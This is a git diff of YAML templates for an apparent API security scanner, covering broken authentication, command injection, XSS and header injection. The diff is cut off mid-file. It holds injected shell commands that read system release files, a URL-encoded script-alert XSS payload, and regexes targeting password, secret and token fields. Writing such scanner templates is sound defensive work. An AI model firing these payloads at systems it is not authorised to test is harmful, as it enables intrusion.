"password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey wordLists: invalidPasswords: - "Default1!" @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - passKey: ${invalidPasswords} + ${passKey}: ${invalidPasswords} + for_each_combination: true - validate: response_code: eq: 429 @@ -111,9 +112,11 @@ execute: - failure: x2 - req: - modify_body_param: - userKey: dummyemail@mail.com + ${userKey}: dummyemail@mail.com + for_each_combination: true - modify_body_param: - passKey: ${invalidPasswords} + ${passKey}: ${invalidPasswords} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/UserEnumerationViaResponseContent.yml b/Broken-User-Authentication/UserEnumerationViaResponseContent.yml index 7947a0821..bd00baa7d 100644 --- a/Broken-User-Authentication/UserEnumerationViaResponseContent.yml +++ b/Broken-User-Authentication/UserEnumerationViaResponseContent.yml @@ -81,20 +81,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey execute: type: multiple requests: - req: - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: or: - response_code: @@ -117,9 +118,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "dummymail@dummy.com" + ${userKey}: "dummymail@dummy.com" + for_each_combination: true - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: response_payload: neq_obj: "${x1.response.body}" @@ -134,9 +137,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "dummymail@dummy.com" + ${userKey}: "dummymail@dummy.com" + for_each_combination: true - modify_body_param: - passKey: Default2! + ${passKey}: Default2! + for_each_combination: true - validate: response_payload: eq_obj: "${x2.response.body}" diff --git a/Broken-User-Authentication/UsernameEnumerationCaptchaEndpoint.yml b/Broken-User-Authentication/UsernameEnumerationCaptchaEndpoint.yml index 01baed8a3..e6efb6a92 100644 --- a/Broken-User-Authentication/UsernameEnumerationCaptchaEndpoint.yml +++ b/Broken-User-Authentication/UsernameEnumerationCaptchaEndpoint.yml @@ -82,20 +82,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "captcha" - extract: captchaKey + extractMultiple: captchaKey execute: type: multiple requests: - req: - modify_body_param: - captchaKey: "0000" + ${captchaKey}: "0000" + for_each_combination: true - validate: response_code: gte: 400 @@ -112,8 +113,9 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com - captchaKey: "0000" + ${userKey}: dummymail@dummy.com + ${captchaKey}: "0000" + for_each_combination: true - validate: response_payload: neq_obj: "${x1.response.body}" diff --git a/Broken-User-Authentication/UsernameEnumerationRedirectPageAnalysis.yml b/Broken-User-Authentication/UsernameEnumerationRedirectPageAnalysis.yml index 455f68898..e94224705 100644 --- a/Broken-User-Authentication/UsernameEnumerationRedirectPageAnalysis.yml +++ b/Broken-User-Authentication/UsernameEnumerationRedirectPageAnalysis.yml @@ -81,20 +81,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey execute: type: multiple requests: - req: - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - modify_url: regex_replace: regex: https @@ -116,9 +117,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - modify_url: regex_replace: regex: https @@ -138,9 +141,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default2! + ${passKey}: Default2! + for_each_combination: true - modify_url: regex_replace: regex: https diff --git a/Command-Injection/CommandInjectionAmazonLinux.yml b/Command-Injection/CommandInjectionAmazonLinux.yml index 16aa8a9cd..ec4d361ec 100644 --- a/Command-Injection/CommandInjectionAmazonLinux.yml +++ b/Command-Injection/CommandInjectionAmazonLinux.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -121,9 +123,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat /etc/os-release" + ${changed_body_key}: "cat /etc/os-release" + for_each_combination: true - modify_query_param: - changed_query_key: "cat /etc/os-release" + ${changed_query_key}: "cat /etc/os-release" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionBase64Encoding.yml b/Command-Injection/CommandInjectionBase64Encoding.yml index bd7dcb1ff..fa71f6603 100644 --- a/Command-Injection/CommandInjectionBase64Encoding.yml +++ b/Command-Injection/CommandInjectionBase64Encoding.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionBase64EncodingChained.yml b/Command-Injection/CommandInjectionBase64EncodingChained.yml index 415f73a07..144fd901a 100644 --- a/Command-Injection/CommandInjectionBase64EncodingChained.yml +++ b/Command-Injection/CommandInjectionBase64EncodingChained.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionCentOS.yml b/Command-Injection/CommandInjectionCentOS.yml index 10c16da49..d67e28a49 100644 --- a/Command-Injection/CommandInjectionCentOS.yml +++ b/Command-Injection/CommandInjectionCentOS.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -121,9 +123,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat /etc/centos-release" + ${changed_body_key}: "cat /etc/centos-release" + for_each_combination: true - modify_query_param: - changed_query_key: "cat /etc/centos-release" + ${changed_query_key}: "cat /etc/centos-release" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionCookieHeaderChained.yml b/Command-Injection/CommandInjectionCookieHeaderChained.yml index be56ded88..924e986e6 100644 --- a/Command-Injection/CommandInjectionCookieHeaderChained.yml +++ b/Command-Injection/CommandInjectionCookieHeaderChained.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: "^Cookie$|^cookie$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -80,7 +80,8 @@ execute: requests: - req: - modify_header: - userKey: ${userVal}${specialOSPayloads} + ${userKey}: ${userVal}${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionCurl.yml b/Command-Injection/CommandInjectionCurl.yml index 185d525d1..a9dc323e6 100644 --- a/Command-Injection/CommandInjectionCurl.yml +++ b/Command-Injection/CommandInjectionCurl.yml @@ -72,14 +72,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -91,9 +91,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionCurlHTTPRequestWithChainedCommands.yml b/Command-Injection/CommandInjectionCurlHTTPRequestWithChainedCommands.yml index 549d0ce0d..9658766ba 100644 --- a/Command-Injection/CommandInjectionCurlHTTPRequestWithChainedCommands.yml +++ b/Command-Injection/CommandInjectionCurlHTTPRequestWithChainedCommands.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionMacOS.yml b/Command-Injection/CommandInjectionMacOS.yml index 4bf80bf3f..3036d7dbd 100644 --- a/Command-Injection/CommandInjectionMacOS.yml +++ b/Command-Injection/CommandInjectionMacOS.yml @@ -71,14 +71,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -93,9 +93,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionMultipartFormDataHeaderChained.yml b/Command-Injection/CommandInjectionMultipartFormDataHeaderChained.yml index 3a6bc4474..678752414 100644 --- a/Command-Injection/CommandInjectionMultipartFormDataHeaderChained.yml +++ b/Command-Injection/CommandInjectionMultipartFormDataHeaderChained.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: "^Content-Type$|^content-type$" - extract: userKey + extractMultiple: userKey value: regex: "multipart/form-data" extract: userVal @@ -82,7 +82,8 @@ execute: requests: - req: - modify_header: - userKey: ${userVal}${specialOSPayloads} + ${userKey}: ${userVal}${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionRHEL.yml b/Command-Injection/CommandInjectionRHEL.yml index 46e6a7c1a..38f1a3fcb 100644 --- a/Command-Injection/CommandInjectionRHEL.yml +++ b/Command-Injection/CommandInjectionRHEL.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -122,9 +124,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat /etc/redhat-release" + ${changed_body_key}: "cat /etc/redhat-release" + for_each_combination: true - modify_query_param: - changed_query_key: "cat /etc/redhat-release" + ${changed_query_key}: "cat /etc/redhat-release" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionTimeDelay.yml b/Command-Injection/CommandInjectionTimeDelay.yml index f5b7ceeda..9beba74a1 100644 --- a/Command-Injection/CommandInjectionTimeDelay.yml +++ b/Command-Injection/CommandInjectionTimeDelay.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -128,9 +128,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Command-Injection/CommandInjectionTimeDelayWithChainedCommands.yml b/Command-Injection/CommandInjectionTimeDelayWithChainedCommands.yml index 724cd47a2..91694b412 100644 --- a/Command-Injection/CommandInjectionTimeDelayWithChainedCommands.yml +++ b/Command-Injection/CommandInjectionTimeDelayWithChainedCommands.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -129,9 +129,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Command-Injection/CommandInjectionUbuntu.yml b/Command-Injection/CommandInjectionUbuntu.yml index 83ad11b1a..c0c887233 100644 --- a/Command-Injection/CommandInjectionUbuntu.yml +++ b/Command-Injection/CommandInjectionUbuntu.yml @@ -77,14 +77,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -99,9 +99,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionUserAgentHeaderChained.yml b/Command-Injection/CommandInjectionUserAgentHeaderChained.yml index 301835acb..d6eb1fbd6 100644 --- a/Command-Injection/CommandInjectionUserAgentHeaderChained.yml +++ b/Command-Injection/CommandInjectionUserAgentHeaderChained.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: "^User-Agent$|^user-agent$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -81,7 +81,8 @@ execute: requests: - req: - modify_header: - userKey: ${userVal}${specialOSPayloads} + ${userKey}: ${userVal}${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionVariableAssignChainedCommands.yml b/Command-Injection/CommandInjectionVariableAssignChainedCommands.yml index 3312f989f..249430be2 100644 --- a/Command-Injection/CommandInjectionVariableAssignChainedCommands.yml +++ b/Command-Injection/CommandInjectionVariableAssignChainedCommands.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -118,9 +120,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "echo $VAR" + ${changed_body_key}: "echo $VAR" + for_each_combination: true - modify_query_param: - changed_query_key: "echo $VAR" + ${changed_query_key}: "echo $VAR" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionVariableAssignment.yml b/Command-Injection/CommandInjectionVariableAssignment.yml index 7e5121119..2be2e6340 100644 --- a/Command-Injection/CommandInjectionVariableAssignment.yml +++ b/Command-Injection/CommandInjectionVariableAssignment.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -89,9 +89,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -118,9 +120,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "echo $VAR" + ${changed_body_key}: "echo $VAR" + for_each_combination: true - modify_query_param: - changed_query_key: "echo $VAR" + ${changed_query_key}: "echo $VAR" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionWithParameters.yml b/Command-Injection/CommandInjectionWithParameters.yml index a1ec71f3d..1de4c5b19 100644 --- a/Command-Injection/CommandInjectionWithParameters.yml +++ b/Command-Injection/CommandInjectionWithParameters.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -98,9 +98,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionWithRedirectionAndVarManipulation.yml b/Command-Injection/CommandInjectionWithRedirectionAndVarManipulation.yml index 8127b4cdc..8f4e1740a 100644 --- a/Command-Injection/CommandInjectionWithRedirectionAndVarManipulation.yml +++ b/Command-Injection/CommandInjectionWithRedirectionAndVarManipulation.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -90,9 +90,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -119,9 +121,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat output.txt" + ${changed_body_key}: "cat output.txt" + for_each_combination: true - modify_query_param: - changed_query_key: "cat output.txt" + ${changed_query_key}: "cat output.txt" + for_each_combination: true - validate: response_payload: length: diff --git a/Command-Injection/CommandInjectionWithRedirectionAndVariableManipulationWithChaining.yml b/Command-Injection/CommandInjectionWithRedirectionAndVariableManipulationWithChaining.yml index 029957fbb..7da86f9d5 100644 --- a/Command-Injection/CommandInjectionWithRedirectionAndVariableManipulationWithChaining.yml +++ b/Command-Injection/CommandInjectionWithRedirectionAndVariableManipulationWithChaining.yml @@ -70,14 +70,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -90,9 +90,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialOSPayloads} + ${changed_body_key}: ${specialOSPayloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialOSPayloads} + ${changed_query_key}: ${specialOSPayloads} + for_each_combination: true - validate: and: - response_code: @@ -119,9 +121,11 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: "cat output.txt" + ${changed_body_key}: "cat output.txt" + for_each_combination: true - modify_query_param: - changed_query_key: "cat output.txt" + ${changed_query_key}: "cat output.txt" + for_each_combination: true - validate: response_payload: length: diff --git a/Cross-Site-Scripting/BasicXSSDELETE.yml b/Cross-Site-Scripting/BasicXSSDELETE.yml index 79b913221..f0ace55d9 100644 --- a/Cross-Site-Scripting/BasicXSSDELETE.yml +++ b/Cross-Site-Scripting/BasicXSSDELETE.yml @@ -46,15 +46,16 @@ api_selection_filters: for_one: key: regex: .* - extract: body_param_key + extractMultiple: body_param_key execute: type: single requests: - req: - modify_body_param: - body_param_key: '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + ${body_param_key}: '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + for_each_combination: true validate: response_payload: contains_all: diff --git a/Cross-Site-Scripting/BasicXSSPATCH.yml b/Cross-Site-Scripting/BasicXSSPATCH.yml index 661f6c7f1..eec9659f3 100644 --- a/Cross-Site-Scripting/BasicXSSPATCH.yml +++ b/Cross-Site-Scripting/BasicXSSPATCH.yml @@ -46,15 +46,16 @@ api_selection_filters: for_one: key: regex: .* - extract: body_param_key + extractMultiple: body_param_key execute: type: single requests: - req: - modify_body_param: - body_param_key: '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + ${body_param_key}: '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + for_each_combination: true validate: response_payload: contains_all: diff --git a/Injection-Attacks/HTTPHeaderInjectionIPXSS.yml b/Injection-Attacks/HTTPHeaderInjectionIPXSS.yml index 60d2eae3a..386c3f782 100644 --- a/Injection-Attacks/HTTPHeaderInjectionIPXSS.yml +++ b/Injection-Attacks/HTTPHeaderInjectionIPXSS.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "^X-Forwarded-For$|^X-Real-IP$|^X-Forwarded-Host$|^X-Cluster-Client-IP$|^Forwarded$|^CF-Connecting-IP$|^True-Client-IP$|^X-Original-Forwarded-For$|^X-Client-IP$|^Client-IP$|^X-Azure-Client-IP$|^X-Azure-ClientIP$|^X-Akamai-Client-IP$|^X-Originating-IP$|^X-Remote-IP$|^X-Appengine-User-IP$|^Via$|^X-Host$|^X-ProxyUser-Ip$|^X-Forwarded$|^X-Real-IP-From$|^CF-Connecting-IPv6$|^Remote-Addr$|^X-Client-Public-IP$|^X-Forwarded-For-IP$|^X-Cloudflare-CDN-Loop$|^X-Coming-From$|^X-Originating-URL$|^X-Client-Connection-IP$" - extract: userKey + extractMultiple: userKey value: regex: "\b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" extract: userVal @@ -91,8 +91,9 @@ execute: requests: - req: - modify_header: - userKey: ${XSSPayloads} + ${userKey}: ${XSSPayloads} + for_each_combination: true validate: or: - response_payload: diff --git a/Injection-Attacks/HTTPHeaderInjectionIncorrectIP.yml b/Injection-Attacks/HTTPHeaderInjectionIncorrectIP.yml index 3d2af1b8c..d777a9f67 100644 --- a/Injection-Attacks/HTTPHeaderInjectionIncorrectIP.yml +++ b/Injection-Attacks/HTTPHeaderInjectionIncorrectIP.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "^X-Forwarded-For$|^X-Real-IP$|^X-Forwarded-Host$|^X-Cluster-Client-IP$|^Forwarded$|^CF-Connecting-IP$|^True-Client-IP$|^X-Original-Forwarded-For$|^X-Client-IP$|^Client-IP$|^X-Azure-Client-IP$|^X-Azure-ClientIP$|^X-Akamai-Client-IP$|^X-Originating-IP$|^X-Remote-IP$|^X-Appengine-User-IP$|^Via$|^X-Host$|^X-ProxyUser-Ip$|^X-Forwarded$|^X-Real-IP-From$|^CF-Connecting-IPv6$|^Remote-Addr$|^X-Client-Public-IP$|^X-Forwarded-For-IP$|^X-Cloudflare-CDN-Loop$|^X-Coming-From$|^X-Originating-URL$|^X-Client-Connection-IP$" - extract: userKey + extractMultiple: userKey value: regex: "\b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" extract: userVal @@ -95,8 +95,9 @@ execute: requests: - req: - modify_header: - userKey: ${IPPayloads} + ${userKey}: ${IPPayloads} + for_each_combination: true validate: or: - response_payload: diff --git a/Injection-Attacks/HTTPHeaderInjectionObfuscatedIP.yml b/Injection-Attacks/HTTPHeaderInjectionObfuscatedIP.yml index 2c213717f..16d6e7a0e 100644 --- a/Injection-Attacks/HTTPHeaderInjectionObfuscatedIP.yml +++ b/Injection-Attacks/HTTPHeaderInjectionObfuscatedIP.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "^X-Forwarded-For$|^X-Real-IP$|^X-Forwarded-Host$|^X-Cluster-Client-IP$|^Forwarded$|^CF-Connecting-IP$|^True-Client-IP$|^X-Original-Forwarded-For$|^X-Client-IP$|^Client-IP$|^X-Azure-Client-IP$|^X-Azure-ClientIP$|^X-Akamai-Client-IP$|^X-Originating-IP$|^X-Remote-IP$|^X-Appengine-User-IP$|^Via$|^X-Host$|^X-ProxyUser-Ip$|^X-Forwarded$|^X-Real-IP-From$|^CF-Connecting-IPv6$|^Remote-Addr$|^X-Client-Public-IP$|^X-Forwarded-For-IP$|^X-Cloudflare-CDN-Loop$|^X-Coming-From$|^X-Originating-URL$|^X-Client-Connection-IP$" - extract: userKey + extractMultiple: userKey value: regex: "\b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" extract: userVal @@ -94,8 +94,9 @@ execute: requests: - req: - modify_header: - userKey: ${IPPayloads} + ${userKey}: ${IPPayloads} + for_each_combination: true validate: or: - response_payload: diff --git a/Injection-Attacks/NoSQLiBooleanBasedJSONBodyParamJS.yml b/Injection-Attacks/NoSQLiBooleanBasedJSONBodyParamJS.yml index 93323615a..d19683c03 100644 --- 